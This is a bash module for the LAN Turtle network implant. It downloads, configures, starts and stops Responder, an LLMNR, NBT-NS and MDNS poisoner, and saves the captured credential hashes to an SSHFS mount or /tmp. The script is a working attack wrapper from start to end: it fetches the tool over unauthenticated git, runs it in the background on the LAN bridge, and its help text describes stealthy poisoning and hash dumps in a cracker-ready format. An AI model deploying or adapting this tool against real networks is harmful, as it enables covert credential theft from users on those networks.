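#!/bin/bash /usr/lib/turtle/turtle_module
# LAN Turtle module that installs, configures, starts and stops Responder.
# The entry points defined here are start, stop, status and configure.
VERSION="1.0"
DESCRIPTION="Responder - LLMNR, NBT-NS and MDNS poisoner"
# NOTE(review): fixed, predictable path in /tmp. `configure` writes to it via a
# redirection, which follows symlinks; a per-run mktemp file would be safer if
# nothing else depends on this exact name - confirm before changing.
CONF=/tmp/responder.form
AUTHOR=IMcPwn

# Exit codes returned by dialog(1); each default applies only when unset.
: "${DIALOG_OK=0}"
: "${DIALOG_CANCEL=1}"
: "${DIALOG_HELP=2}"
: "${DIALOG_EXTRA=3}"
: "${DIALOG_ESC=255}"

#######################################
# Point Responder's logs directory at the chosen target and schedule Responder.
# Arguments: $1 - directory that should receive the logs
# Outputs:   status message on stdout
#######################################
_responder_run_with_logs() {
  local log_dir=$1
  local link=/etc/turtle/Responder/logs

  # A non-empty Responder.db is removed before each run.
  if [ -s /etc/turtle/Responder/Responder.db ]; then
    rm -f -- /etc/turtle/Responder/Responder.db
  fi

  # Re-create the symlink only when it does not already point at the target.
  # -f keeps rm quiet when the link/directory does not exist yet.
  # NOTE(review): per the help text, captured hashes are written under this
  # directory; consider restricting its permissions - confirm what the
  # target filesystem supports.
  if [[ "$(readlink "$link")" != "$log_dir" ]]; then
    rm -rf -- "$link"
    mkdir -p -- "$log_dir"
    ln -s -- "$log_dir" "$link"
  fi

  # Hand the process to at(1) so it is not tied to this shell.
  echo "python /etc/turtle/Responder/Responder.py -I br-lan" | at now
  echo "Responder started and logs are being saved to $log_dir"
}

#######################################
# Install missing dependencies, fetch Responder if absent, then start it
# with logs directed to the location stored in the responder UCI config.
# Outputs: status messages on stdout, failures on stderr
# Returns: non-zero when the Responder checkout cannot be obtained
#######################################
function start {
  if [ ! -s /usr/bin/git ]; then
    opkg update && opkg install git
  fi
  if [ ! -s /usr/lib/python2.7/sqlite3/dbapi2.py ]; then
    opkg update && opkg install python-sqlite3
  fi

  if [[ ! -d /etc/turtle/Responder || ! -s /etc/turtle/Responder/Responder.py ]]; then
    # -f: the directory may not exist on a first run.
    rm -rf -- /etc/turtle/Responder
    # NOTE(review): git:// is an unauthenticated, unencrypted transport and the
    # checkout is later executed by start. Nothing here pins or verifies what
    # was fetched; an authenticated transport plus a pinned commit would close
    # that gap - confirm what the device's git build supports.
    if ! git clone git://github.com/SpiderLabs/Responder /etc/turtle/Responder; then
      echo "Failed to download Responder." >&2
      return 1
    fi
  fi

  if [ -s /etc/config/responder ]; then
    responder_log=$(uci get responder.log)
    case "$responder_log" in
      sshfs)
        # Only use the SSHFS target when an sshfs process is running.
        if pgrep sshfs > /dev/null; then
          _responder_run_with_logs /sshfs/Responder/logs
        else
          echo "SSHFS not running"
        fi
        ;;
      tmp)
        _responder_run_with_logs /tmp/Responder/logs
        ;;
      *)
        # Previously an unrecognised value was ignored without any output.
        echo "Unknown Responder log target: $responder_log" >&2
        ;;
    esac
  else
    echo "Responder not configured."
  fi
}

#######################################
# Stop every running Responder.py process started from /etc/turtle/Responder.
# Returns: 0 when nothing is running, otherwise the status of kill
#######################################
function stop {
  local pids
  # The [/] bracket keeps grep from matching its own command line.
  pids=$(ps | grep -w '[/]etc/turtle/Responder/Responder.py' | awk '{print $1}')
  if [ -z "$pids" ]; then
    # Nothing to stop; avoid calling kill with no arguments.
    return 0
  fi
  # Word splitting is intended here: one PID per word.
  # shellcheck disable=SC2086
  kill $pids
}

#######################################
# Report whether Responder is running.
# Outputs: "1" when a matching process exists, "0" otherwise
#######################################
function status {
  if ps | grep -w -q '[/]etc/turtle/Responder/Responder.py'; then
    echo "1"
  else
    echo "0"
  fi
}

#######################################
# Interactive dialog that stores the log destination in the responder
# UCI config (responder.log = sshfs | tmp).
#######################################
function configure {
  local rc

  if [ -s /etc/config/responder ]; then
    responder_log=$(uci get responder.log)
  else
    touch /etc/config/responder
  fi

  # dialog prints the selected tag on stderr, which is captured in $CONF.
  dialog --ok-label "Submit" \
    --help-button \
    --title "Responder Configuration" \
    --radiolist "\n\
For information on the different log files, see Help\n\nNOTICE: The first time you run this module it may take a long time to load because of dependencies. Please let it finish.\n\nThe log files can be saved to SSHFS or /tmp.\n" 16 60 3 \
    1 "Save log to SSHFS if available." off \
    2 "Save log to /tmp/" off \
    2>"$CONF"
  rc=$?

  case "$rc" in
    "$DIALOG_OK")
      LOG=$(cat -- "$CONF")
      case "$LOG" in
        1)
          uci set responder.log="sshfs"
          uci commit responder
          ;;
        2)
          uci set responder.log="tmp"
          uci commit responder
          ;;
      esac
      ;;
    "$DIALOG_CANCEL")
      rm -f -- "$CONF"
      clear
      exit
      ;;
    "$DIALOG_HELP")
      dialog --title "Help" \
        --msgbox "\
Responder is an LLMNR, NBT-NS and MDNS poisoner. It will answer to specific NBT-NS (NetBIOS Name Service) queries based on their name suffix (see: http://support.microsoft.com/kb/163409).\n\
By default, the tool will only answer to File Server Service request, which is for SMB.\n\n\
The concept behind this is to target our answers, and be stealthier on the network. This also helps to ensure that we don't break legitimate NBT-NS behavior.\n\n\
All activity will be logged to Responder-Session.log\n\
Analyze mode will be logged to Analyze-Session.log\n\
Poisoning will be logged to Poisoners-Session.log\n\n\
All hashes are dumped an unique file John Jumbo compliant, using this format:\n\
(MODULE_NAME)-(HASH_TYPE)-(CLIENT_IP).txt\n\n\
For more information, see: https://github.com/SpiderLabs/Responder\n\
" 25 60
      # Return to the configuration screen once the help box is dismissed.
      configure
      ;;
    "$DIALOG_ESC")
      clear
      ;;
  esac
}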